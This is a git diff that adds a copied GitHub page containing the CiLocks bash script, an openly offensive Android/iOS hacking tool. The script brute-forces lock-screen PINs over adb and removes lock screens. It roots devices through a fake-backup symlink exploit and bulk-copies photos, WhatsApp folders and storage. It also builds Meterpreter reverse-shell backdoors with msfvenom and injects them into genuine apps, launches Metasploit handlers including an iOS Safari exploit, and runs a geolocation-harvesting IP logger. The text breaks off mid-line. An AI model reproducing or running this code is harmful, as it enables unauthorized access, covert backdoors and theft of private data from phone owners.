diff --git a/ALLProblemsovle b/ALLProblemsovle new file mode 100644 index 0000000..5edbc9d --- /dev/null +++ b/ALLProblemsovle @@ -0,0 +1,1072 @@ + +Skip to content +Pull requests +Issues +Marketplace +Explore +@zexisff4x +tegal1337 / +CiLocks +Public + +Code +Issues 12 +Pull requests +Discussions +Actions +Projects +Wiki +Security + + Insights + +CiLocks/cilocks +@LoliC0d3 +LoliC0d3 Fix Ngrok Url Not Show +Latest commit bf74fa0 on Sep 17, 2021 +History +1 contributor +1028 lines (854 sloc) 27.7 KB +#!/usr/bin/env bash + +##############################color +m="\e[0;31m" # merah # red +k="\e[0;33m" # kuning # yellow +h="\e[0;32m" # hijau # green +b="\e[0;34m" # biru # blue +lm="\e[1;31m" # merah terang # pink +lk="\e[1;33m" # kuning terang # bright yellow +lh="\e[1;32m" # hijau terang # light green +lb="\e[1;34m" # langit biru # blue sky +n="\e[0m" # netral # neutral +w="\e[1;37m" # putih tebal #thick white + + +###############################give Permissons,if not root user exit +clear +[[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo -e ${m} "You must be root to run the script${n}"; echo ; exit 1; } +path=$(pwd) +name='cilocks' +version="v2.1" +function files() { + file=$path/$name + bash $file +} +function banner() { + +echo -e "${lb} + _______ __ __ + / ____(_) / ____ _____/ /_______ + / / / / / / __ \/ ___/ //_/ ___/ +/ /___/ / /___/ /_/ / /__/ ,< (__ ) +\____/_/_____/\____/\___/_/|_/____/$version +${n}" +echo -e "${m} Crack Interface LockScreen${n}" +echo -e "${m} Android/IOS Hacking${n}" +echo -e "${lb} LoliC0d3 - Tegal1337${n}" +} + +# function menu() { +# clear +# banner +# home +# } +lanip=$(ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/') +lanip6=$(ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/') +publicip=$(dig +short myip.opendns.com @resolver1.opendns.com) +# host=$(host "$publicip" | awk '{print $5}' | sed 's/.$//') +#####os +source data/os +sleep 1 +function os() { + banner +echo -e "${m} Detect Your OS ${n}" +} +os +sleep 0.5 +echo "Kernel: "$(uname) +sleep 0.5 +echo $(lsb_release -i) +sleep 0.5 +echo $(lsb_release -c) +sleep 0.5 +echo "Your IP Address: "$lanip +sleep 3 +# echo "Your IP Address (Ipv6): "$lanip6 +# sleep 0.5 +# echo "Your IP Address (Public): "$host +# sleep 0.5 +clear +function config() { + banner +echo -e "${m} Detect Installed Package ${n}" +} +config +source data/config +clear +# banner + clear + banner + echo -e "${lh} + 1.Update + 2.Brute Pin 4 Digit + 3.Brute Pin 6 Digit + 4.Brute LockScreen Using Wordlist + 5.Bypass LockScreen {Antiguard} Not Support All OS Version + 6.Root Android {Supersu} Not Support All OS Version + 7.Jump To Adb Toolkit + 8.Reset Data + 9.Remove LockScreen {Root} + 10.Jump To Metasploit + 11.Control Android {Scrcpy} + 12.Phone Info + 13.IP Logger {Over Internet} + 14.Get WebCam {Over Internet} + 15.FireStore Vulnerability + 99.Exit + ${n}" + read -p "senpai@tegalsec:~# " select +if [[ $select == 1 ]]; then + # remove old version + rm -f "${path}/cilocks" >/dev/null 2>&1 + rm -f "${path}/data/config" >/dev/null 2>&1 + rm -f "${path}/data/os" >/dev/null 2>&1 + # update new release + wget https://raw.githubusercontent.com/tegal1337/CiLocks/main/cilocks -O "${path}/cilocks" >/dev/null 2>&1 + wget https://raw.githubusercontent.com/tegal1337/CiLocks/main/data/config -O "${path}/data/config" >/dev/null 2>&1 + wget https://raw.githubusercontent.com/tegal1337/CiLocks/main/data/os -O "${path}/data/os" >/dev/null 2>&1 + # give permission + chmod +x "${path}/cilocks" >/dev/null 2>&1 + chmod +x "${path}/data/config" >/dev/null 2>&1 + chmod +x "${path}/data/os" >/dev/null 2>&1 + echo "Done!" + echo "Restart Cilocks..." + sleep 3 + files + +elif [[ $select == 2 ]]; then + adb shell input keyevent 26 #Pressing the lock button + adb shell input keyevent 82 + + echo "Brute Pin 4 Digit" + for i in {0000..9999}; do + echo "Try =>" $i + + for (( j=0; j<${#i}; j++ )); do + adb shell input keyevent $((`echo ${i:$j:1}`+7)) + done + + adb shell input keyevent 66 + + if ! (( `expr $i + 1` % 5 )); then + adb shell input keyevent 66 + echo "Delay Limit 30s" + sleep 30 + adb shell input keyevent 82 + adb shell input swipe 407 1211 378 85 + fi + done + +elif [[ $select == 3 ]]; then + adb shell input keyevent 26 #Pressing the lock button + adb shell input keyevent 82 + + echo "Brute Pin 6 Digit" + for i in {000000..999999}; do + echo "Try =>" $i + + for (( j=0; j<${#i}; j++ )); do + adb shell input keyevent $((`echo ${i:$j:1}`+7)) + done + + adb shell input keyevent 66 + + if ! (( `expr $i + 1` % 5 )); then + adb shell input keyevent 66 + echo "Delay Limit 30s" + secs=$((1 * 30)) + while [ $secs -gt 0 ]; do + echo -ne "$secs\033[0K\r" + sleep 1 + : $((secs--)) + done + + sleep 30 + adb shell input keyevent 82 + adb shell input swipe 407 1211 378 85 + fi + done + +elif [[ $select == 4 ]]; then + adb shell input keyevent 26 #Pressing the lock button + adb shell input keyevent 82 + echo "Brute LockScreen Using Wordlist" + read -p "list -> " files + for i in `cat $files`; do + echo "Try =>" $i + + for (( j=0; j<${#i}; j++ )); do + adb shell input keyevent $((`echo ${i:$j:1}`+7)) + done + + adb shell input keyevent 66 + + if ! (( `expr $i + 1` % 5 )); then + adb shell input keyevent 66 + echo "Delay Limit 30s" + secs=$((1 * 30)) + while [ $secs -gt 0 ]; do + echo -ne "$secs\033[0K\r" + sleep 1 + : $((secs--)) + done + + sleep 30 + adb shell input keyevent 82 + adb shell input swipe 407 1211 378 85 + fi + done + +elif [[ $select == 5 ]]; then + adb shell pm list packages | grep io.kos.antiguard 2>/dev/null > /dev/null + +isInstalled=$? + + +if [ $isInstalled -eq 0 ]; then + adb uninstall io.kos.antiguard +else + adb install ./AntiGuard/AntiGuard.apk + adb shell am start io.kos.antiguard/.unlock +fi + +elif [[ $select == 6 ]]; then + adb restore modules/fakebackup.ab + + command "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99 2>/dev/null; do :; done; echo 'Overwrote local.prop!';" + +if command "cat /data/local.prop" + then echo "Succesfully rooted!" + echo "Requires a reboot..." + adb reboot + sleep 2 + adb wait-for-device + command "mount -o rw,remount /system" + adb push modules/su-static /system/xbin/su + command "/data/local/tmp/busybox chown 0:0 /system/xbin/su" + command "/data/local/tmp/busybox chmod 6777 /system/xbin/su" + adb push modules/Superuser.apk /system/app/ + command "rm /data/local.prop" + adb reboot +fi + +elif [[ $select == 7 ]]; then + clear + function mmeta() { + banner + echo -e "${m} Adb Toolkit${n}" + } + mmeta + echo -e "${lh} +1.Shell +2.ScreenShot +3.Copy All Camera Photo +4.Copy All WhatsApp Folder +5.Copy All Data Storage +6.Manual Copy {Costum} +7.Backup Data +8.Restore Data +9.Permissons Reset +10.Reboot +99.Menu +${n} " +fpath="backup" +read -p "senpai@tegalsec:~# " select + if [[ $select == 1 ]]; then + echo "Opening Shell..." + sleep 3 + adb shell + elif [[ $select == 2 ]]; then + export time=$(date +"%T") + path=Files/Screenshot + file=screenshoot-$time.png + paths=$path/$file + adb exec-out screencap -p > $file + sudo mv $file $paths + echo "Your File Saved In $paths " + elif [[ $select == 3 ]]; then + export time=$(date +"%T") + path=Files + dir=DCIM-$time + paths=$path/$dir + adb pull /sdcard/DCIM/ $path/$dir + echo "Your File Saved In $paths " + elif [[ $select == 4 ]]; then + export time=$(date +"%T") + path=Files + dir=WhatsApp-$time + paths=$path/$dir + adb pull /sdcard/WhatsApp/ $paths + echo "Your File Saved In $paths " + elif [[ $select == 5 ]]; then + export time=$(date +"%T") + path=Files + dir=sdcard-$time + paths=$path/$dir + adb pull /sdcard/ $paths + echo "Your File Saved In $paths " + elif [[ $select == 6 ]]; then + echo "Ex: /sdcard/Document/" + read -p "Enter Path: " pathz + read -p "Enter Name Folder: " dir + path=Files + paths=$path/$dir + adb pull $pathz $paths + echo "Your File Saved In $paths " + elif [[ $select == 7 ]]; then + adb backup -apk -shared -all -f $fpath/backup.ab + elif [[ $select == 8 ]]; then + adb restore $fpath/backup.ab“ + elif [[ $select == 9 ]]; then + adb shell pm reset-permissions + elif [[ $select == 10 ]]; then + adb reboot &> /dev/null + elif [[ $select == 99 ]]; then + files + fi +elif [[ $select == 8 ]]; then + echo -e "${lh} + 1.Fastboot + 2.Recovery + ${n}" + read -p "senpai@tegalsec:~# " select + if [[ $select == 1 ]]; then + adb reboot bootloader + deviceConnected=konek + if [ "$(konek)" = 'NO' ]; then + echo "Waiting Phone..." + $adb wait-for-device + fi + fastboot devices + fastboot erase userdata + fastboot erase cache + elif [[ $slect == 2 ]]; then + deviceConnected=konek + if [ "$(konek)" = 'NO' ]; then + echo "Waiting Phone..." + $adb wait-for-device + fi + adb devices + adb shell recovery --wipe_data + else + echo -e "${m} Your Brain Error!${n}" + fi + +elif [[ $select == 9 ]]; then + rem=$(adb shell su -c rm /data/system/*.key | adb reboot ) + echo $rem + echo "success" + + + +elif [[ $select == 10 ]]; then + clear + function mmeta() { + banner + echo -e "${m} Metasploit Backdoor Generator${n}" + } + mmeta +echo -e "${lh} +1.Install Application +2.Create Payload Backdoor {Msfvenom} Singed +3.Run Metasploit +4.Inject Payload In Original Application +99.Menu +${n}" +read -p "senpai@tegalsec:~# " select +if [[ $select == 1 ]]; then + read -p "Enter Ur Application: " app + read -p "Run Application {Y/N}: " run + if [ $run == "Y" ] || [ $run == "y" ]; then + read -p "Enter Package Application Name: " pkg + adb install $app + adb shell am start $pkg/.unlock + else + adb install $app + fi + +elif [[ $select == 2 ]]; then + path="backdoor" + loli="loli.apk" + read -p "Enter LHOST: " host + read -p "Enter LPORT: " port + read -p "Application Name: " app + paths=$path/$loli + echo -e "${lb}Wait Creating Backdoor...${n}" + msfvenom -p android/meterpreter/reverse_tcp lhost=$host lport=$port R> $paths + echo "Wait Installing Keystore..." + sleep 5 + keytool -genkey -V -keystore $path/key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000 + jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore $path/key.keystore $paths hacked + jarsigner -verify -verbose -certs $paths + zipalign -v 4 $paths $path'/'$app'.apk' + milf=$path/$app'.apk' + rm $paths + rm $path/key.keystore + echo "Your Backdoor Created In" $milf +elif [[ $select == 3 ]]; then + clear + mmeta + payload='android/meterpreter/reverse_tcp' + payload2='osx/armle/execute/reverse_tcp' + echo -e "${lh} + Payload {Android}${n} =>${m} $payload ${n}${lh} + Payload (iOS) ${n}=>${m} $payload2 ${n}${lh} + Listener + 1.Multi Handler {Default} + 2.Remove Lock + 3.Remove Lock {Root} + 4.Safari Jit {iOS < 7.1.2} + ${n}" + read -p "senpai@tegalsec:~# " select + if [[ $select == 1 ]]; then + read -p "LHOST: " host + read -p "LPORT: " port + msfconsole=msfconsole + exploit='use exploit/multi/handler' + xterm -T " CiLocks Exploit " -geometry 100x35 -e "$msfconsole -x '$exploit; set PAYLOAD $payload ; set lhost $host ; set lport $port; exploit; exit -y'" + + elif [[ $select == 2 ]]; then + read -p "LHOST: " host + read -p "LPORT: " port + msfconsole=msfconsole + exploit='use post/android/manage/remove_lock' + xterm -T " CiLocks Exploit " -geometry 100x35 -e "$msfconsole -x '$exploit; set PAYLOAD $payload ; set lhost $host ; set lport $port; exploit; exit -y'" + + elif [[ $select == 3 ]]; then + read -p "LHOST: " host + read -p "LPORT: " port + msfconsole=msfconsole + exploit='use post/android/manage/remove_lock_root' + xterm -T " CiLocks Exploit " -geometry 100x35 -e "$msfconsole -x '$exploit; set PAYLOAD $payload ; set lhost $host ; set lport $port; exploit; exit -y'" + + elif [[ $select == 4 ]]; then + read -p "LHOST: " host + read -p "LPORT: " port + msfconsole=msfconsole + exploit='use exploit/apple_ios/browser/safari_jit' + xterm -T " CiLocks Exploit " -geometry 100x35 -e "$msfconsole -x '$exploit; set PAYLOAD $payload2 ; set lhost $host ; set lport $port; exploit; exit -y'" + fi + +elif [[ $select == 4 ]]; then + path="backdoor" + loli="loli.apk" + read -p "Enter LHOST: " host + read -p "Enter LPORT: " port + read -p "Enter Original Application: " ori + read -p "Application Name: " app + paths=$path/$loli + echo -e "${lb}Wait Creating Backdoor...${n}" + msfvenom --platform android -x $ori -p android/meterpreter/reverse_tcp lhost=$host lport=$port -o $paths + +# if error,uncomment it + +# echo "Wait Installing Keystore..." + # sleep 5 + # keytool -genkey -V -keystore $path/key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000 + # jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore $path/key.keystore $paths hacked + # jarsigner -verify -verbose -certs $paths + # zipalign -v 4 $paths $path'/'$app'.apk' + milf=$path/$app'.apk' + rm $paths + # rm $path/key.keystore + echo "Your Backdoor Created In" $milf + elif [[ $select == 99 ]]; then + files + fi + + +elif [[ $select == 11 ]]; then + scrcpy +elif [[ $select == 12 ]]; then + # function info() { + # banner + # echo -e "${m} Phone Info${n}" + # } + # clear + # info + # echo -e "${lh} + # 1.Phone Info + # 2. + # 99.Menu + # ${n}" + # read -p "senpai@tegalsec:~# " select + # if [[ $select == 1 ]]; then + manu=$(adb shell getprop ro.product.manufacturer) + model=$(adb shell getprop ro.product.model) + version=$(adb shell getprop ro.build.version.release ) + sdk=$(adb shell getprop ro.build.version.sdk ) + info=$(printf "%s %s %s (API %s)" "$manu" "$model" "$version" "$sdk") + echo "Info: " $info + echo "Manufacturer: " $manu + echo "Model: " $model + echo "Version: " $version + echo "Sdk: " $sdk + # elif [[ $select == 99 ]]; then + # files + # fi + +elif [[ $select == 13 ]]; then + +# path= "info" + + clear + function logger() { + banner + echo -e "${m} IP Logger {Over Internet}${n}" + } + logger + + menu() { + trap 'echo -e "\n";stop;exit 1' 2 + + + dependencies() { + + command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; } + + + + command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed. Install it. Aborting."; exit 1; } + + } + + + stop() { + + checkngrok=$(ps aux | grep -o "ngrok" | head -n1) + checkphp=$(ps aux | grep -o "php" | head -n1) + checkssh=$(ps aux | grep -o "ssh" | head -n1) + if [[ $checkngrok == *'ngrok'* ]]; then + pkill -f -2 ngrok > /dev/null 2>&1 + killall -2 ngrok > /dev/null 2>&1 + fi + if [[ $checkphp == *'php'* ]]; then + pkill -f -2 php > /dev/null 2>&1 + killall -2 php > /dev/null 2>&1 + fi + if [[ $checkssh == *'ssh'* ]]; then + pkill -f -2 ssh > /dev/null 2>&1 + killall ssh > /dev/null 2>&1 + fi + if [[ -e sendlink ]]; then + rm -rf sendlink + fi + + } + + catch_cred() { + + longitude=$(grep -o 'Longitude:.*' info/geolocate.txt | cut -d " " -f2 | tr -d ' ') + IFS=$'\n' + latitude=$(grep -o 'Latitude:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + altitude=$(grep -o 'Altitude:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + accuracy=$(grep -o 'Accuracy:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + hardware=$(grep -o 'Cores:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + speed=$(grep -o 'Speed:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + platform=$(grep -o 'Platform:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + heading=$(grep -o 'Heading:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + memory=$(grep -o 'Memory:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + useragent=$(grep -o 'User-Agent:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + height=$(grep -o 'Screen Height:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + width=$(grep -o 'Screen Width:.*' info/geolocate.txt | cut -d ":" -f2 | tr -d ' ') + # echo -e "${lh} Geolocation:" + echo -e "${lh} Latitude:${n}" $latitude + echo -e "${lh} Longitude:${n}" $longitude + echo -e "${lh} Altitude:${n}" $altitude + echo -e "${lh} Speed:${n}" $speed + echo -e "${lh} Heading:${n}" $heading + echo -e "${lh} Accuracy:n${n}" $accuracy + echo -e "${lh} Map:${n} https://www.google.com/maps/place/"$latitude"+"$longitude + echo -e "${lh} Device Info:${n}" + echo -e "${lh} Platform:${n}" $platform + echo -e "${lh} Cores:${n}" $hardware + echo -e "${lh} User-Agent:${n}" $useragent + echo -e "${lh} Memory:${n}" $memory + echo -e "${lh} Resolution:${n}" $height"x"$width + cat info/geolocate.txt >> info/saved.geolocate.txt + echo -e "${k} Saved: info/saved.geolocate.txt" + killall -2 php > /dev/null 2>&1 + killall -2 ngrok > /dev/null 2>&1 + killall ssh > /dev/null 2>&1 + if [[ -e sendlink ]]; then + rm -rf sendlink + fi + exit 1 + + } + + getcredentials() { + echo -e "${lh} Waiting Geolocation ...${n}" + while [ true ]; do + + + if [[ -e "info/geolocate.txt" ]]; then + echo -e "${m}[*] Geolocation Found!${n}" + catch_cred + + fi + sleep 0.5 + if [[ -e "info/error.txt" ]]; then + echo -e "\n${m}[*] Error on Geolocation!${n}" + checkerror=$(grep -o 'Error:.*' info/error.txt | cut -d " " -f2 | tr -d ' ' ) + if [[ $checkerror == 1 ]]; then + echo -e "${m} User Denied Geolocation ...${n}" + + rm -rf info/error.txt + getcredentials + elif [[ $checkerror == 2 ]]; then + echo -e "${m} Geolocation Unavailable ...${n}" + + rm -rf info/error.txt + getcredentials + elif [[ $checkerror == 3 ]]; then + echo -e "${m} Time Out ...${n}" + + rm -rf info/error.txt + getcredentials + elif [[ $checkerror == 4 ]]; then + echo -e "${m} Unknow Error ...${n}" + + rm -rf info/error.txt + getcredentials + else + echo -e "${m} Error reading file error.txt...${n}" + exit 1 + fi + fi + sleep 0.5 + + + + done + + + } + + catch_ip() { + touch info/saved.geolocate.txt + ip=$(grep -a 'IP:' info/ip.txt | cut -d " " -f2 | tr -d '\r') + IFS=$'\n' + ua=$(grep 'User-Agent:' info/ip.txt | cut -d '"' -f2) + echo -e "${lh} Target IP:${n}" $ip + echo -e "${lh} User-Agent:${n}" $ua + echo -e "${k} Saved:info/saved.ip.txt${n}" + cat info/ip.txt >> info/saved.ip.txt + + + if [[ -e iptracker.log ]]; then + rm -rf iptracker.log + fi + + IFS='\n' + iptracker=$(curl -s -L "www.ip-tracker.org/locator/ip-lookup.php?ip=$ip" --user-agent "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" > iptracker.log) + IFS=$'\n' + continent=$(grep -o 'Continent.*' iptracker.log | head -n1 | cut -d ">" -f3 | cut -d "<" -f1) + echo -e "\n" + hostnameip=$(grep -o "